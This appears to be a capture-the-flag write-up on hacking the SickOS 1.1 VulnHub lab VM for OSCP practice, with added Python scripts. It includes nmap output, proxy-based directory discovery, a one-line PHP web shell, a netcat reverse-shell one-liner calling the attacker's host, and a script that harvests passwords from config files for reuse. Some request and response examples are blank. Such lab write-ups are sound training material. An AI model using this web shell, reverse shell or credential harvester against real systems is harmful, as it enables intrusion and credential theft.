I recently came across the subreddit /r/oscp and found a comment suggesting that you practise on VulnHub VMs before taking the PWK course. One of the most recommended VMs is SickOS. In this post I will explain how I hacked SickOS 1.1.
Scanning and Discovery
I configured the SickOS VM's network adapter as host-only, so the VM and my machine can reach each other.
First I needed the IP address of the target. I used netdiscover for this, with the network interface set to vboxnet0, the host-only interface SickOS is attached to.
netdiscover showed the target at 192.168.56.101, so I ran nmap against it; the -sC flag runs Nmap's default NSE scripts against the target.
$ nmap -sC 192.168.56.101

Starting Nmap 7.01 ( https://nmap.org ) at 2016-06-13 22:04 WIB
Nmap scan report for 192.168.56.101
Host is up (0.00038s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
| ssh-hostkey:
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 08:00:27:A7:85:FF (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 34.17 seconds
Two ports are open: 22 (SSH) and 3128, which Nmap labels squid-http. Port 8080 is closed rather than filtered, so the host answered but nothing is listening there. Note that -sC without -sV takes the service name from Nmap's port table rather than fingerprinting the listener, so add -sV if you want to confirm it really is Squid and learn its version. Since 3128 is an HTTP proxy, I configured Burp Suite's upstream proxy to 192.168.56.101:3128 for all destination hosts.
When I requested 127.0.0.1 through the proxy, I got a page reading BLEHHH. That is not my own localhost, so it must be SickOS's: Squid resolves 127.0.0.1 on the machine it runs on, which means the open proxy lets me reach a web server bound to the target's loopback or firewalled from the outside (port 80 was among the filtered ports in the scan).
Running Burp's content discovery against 127.0.0.1 through the proxy turned up a directory named /wolfcms.
So I visited /wolfcms
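The loopback check and the directory discovery above, done from a script instead of Burp, as an added example (my own code, not from the original post). Requests are routed through the Squid proxy, so 127.0.0.1 in the URL is resolved on the SickOS box rather than on the attacker's machine. The proxy address comes from the scan above; WORDLIST is a constructed, deliberately tiny list, and the fetch parameter is injectable so the logic can be exercised without a network.

```python
"""Directory discovery through an open Squid proxy (added example, not the
original post's code).  Squid at PROXY resolves 127.0.0.1 on the SickOS box
itself, so a request for http://127.0.0.1/<path> sent through it reaches the
target's loopback-bound web server even though port 80 is filtered from the
outside.  PROXY comes from the nmap scan; TARGET and WORDLIST are assumptions
for this write-up."""
import urllib.error
import urllib.request

PROXY = "http://192.168.56.101:3128"    # Squid from the nmap scan
TARGET = "http://127.0.0.1"             # the target's own loopback, as seen by Squid
WORDLIST = ["wolfcms", "admin", "backup", "robots.txt"]  # constructed, tiny list


def proxied_fetch(url, proxy=PROXY, timeout=5):
    """Return (status, body) for url, sending the request via the HTTP proxy."""
    opener = urllib.request.build_opener(
        urllib.request.ProxyHandler({"http": proxy}))
    try:
        with opener.open(url, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as e:   # 4xx/5xx still carry a status and body
        return e.code, e.read()


def discover(base, words, fetch=proxied_fetch):
    """Probe base/<word>/ for each word; return {path: status} for non-404s.

    `fetch` is injectable so the logic can be tested without a network."""
    found = {}
    for w in words:
        url = f"{base.rstrip('/')}/{w}/"
        status, _ = fetch(url)
        if status != 404:
            found[f"/{w}/"] = status
    return found


def is_target_loopback(fetch=proxied_fetch):
    """The post's sanity check: a BLEHHH banner means we reached SickOS's
    own 127.0.0.1 through the proxy, not the attacker's localhost."""
    status, body = fetch(TARGET + "/")
    return status == 200 and b"BLEHHH" in body


if __name__ == "__main__":
    print("target loopback reached:", is_target_loopback())
    for path, status in discover(TARGET, WORDLIST).items():
        print(status, path)
```

Anything that answers with something other than 404 (including 403, which still proves the directory exists) is worth a look; a real run would use a proper wordlist in place of WORDLIST.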
I logged in as admin and got access to the dashboard. Looking around the dashboard I found a file manager feature, so I tried uploading a simple PHP backdoor.
Here is the code; I named it cmd.php:
<?php system($_REQUEST['c']); ?>
The uploaded backdoor is served from /public/, so I tested it with this request:
The response was:
I needed to switch the method to POST so that I don't have to URL-encode my payload. With GET the command sits in the query string, where & splits parameters, + becomes a space and # starts a fragment; $_REQUEST also reads POST fields, so the same backdoor accepts the command from the request body.
Then I executed a reverse shell back to my machine (192.168.56.1), where nc was already listening on port 9999:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 9999 >/tmp/f
Finally I got a reverse shell. The one-liner works because the named pipe /tmp/f carries whatever nc receives from the listener into the shell's stdin, while the shell's stdout and stderr are piped back into nc.
Now that I have a limited shell, my goal is to escalate privileges to root. I found the database config file for the CMS and tried the password in it against the user sickos, checking for password reuse. It worked, and sudo su then gave me root.
That's it! I obtained root access and got the flag.
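The password-reuse check above in script form, as an added example (not the post's own code): scan the web root for configuration files that assign a password, then list the local accounts worth trying the recovered value against. WEBROOT is an assumption, and the sample config and passwd lines used for testing are constructed.

```python
"""Password-reuse hunt after landing a limited shell (added example, not the
original post's code).  Part 1 scans the web root for configuration files
that assign a password; part 2 lists the local accounts a recovered password
should be tried against.  WEBROOT is an assumption."""
import os
import re

WEBROOT = "/var/www"   # assumed; adjust to wherever the CMS lives

# Matches define('DB_PASS', 'x'), $cfg['password'] = "x", 'db_pass' => 'x', ...
CRED_RE = re.compile(
    r"""(?P<key>\w*(?:pass|pwd|secret)\w*)['"\]]*\s*(?:=>|=|,|:)\s*['"](?P<val>[^'"]{1,128})['"]""",
    re.IGNORECASE,
)
CONFIG_SUFFIXES = (".php", ".ini", ".conf", ".cfg", ".yml", ".yaml", ".env", ".xml")


def credentials_in(text, source="<text>"):
    """Return (source, key, value) for every password-looking assignment."""
    return [(source, m.group("key"), m.group("val")) for m in CRED_RE.finditer(text)]


def find_credentials(root=WEBROOT):
    """Walk root and collect password assignments from config-like files."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(CONFIG_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, errors="replace") as fh:
                    hits.extend(credentials_in(fh.read(), path))
            except OSError:
                continue   # unreadable as the web user; keep going
    return hits


def login_users(passwd_text, min_uid=1000):
    """Human accounts from /etc/passwd: uid >= min_uid and a real shell.
    These are the users to try a recovered password against."""
    users = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) < 7:
            continue
        name, uid, shell = parts[0], int(parts[2]), parts[6]
        if uid >= min_uid and not shell.endswith(("nologin", "false")):
            users.append(name)
    return users


if __name__ == "__main__":
    for src, key, val in find_credentials():
        print(f"{src}: {key} = {val!r}")
    with open("/etc/passwd") as fh:
        print("try against:", login_users(fh.read()))
```

The regex is deliberately loose (it will also flag things like "bypass"), which is the right trade-off for a manual hunt. su usually insists on a terminal, so upgrade the reverse shell to a pty first (for example with python -c 'import pty; pty.spawn("/bin/bash")') before trying the candidate password against each listed user.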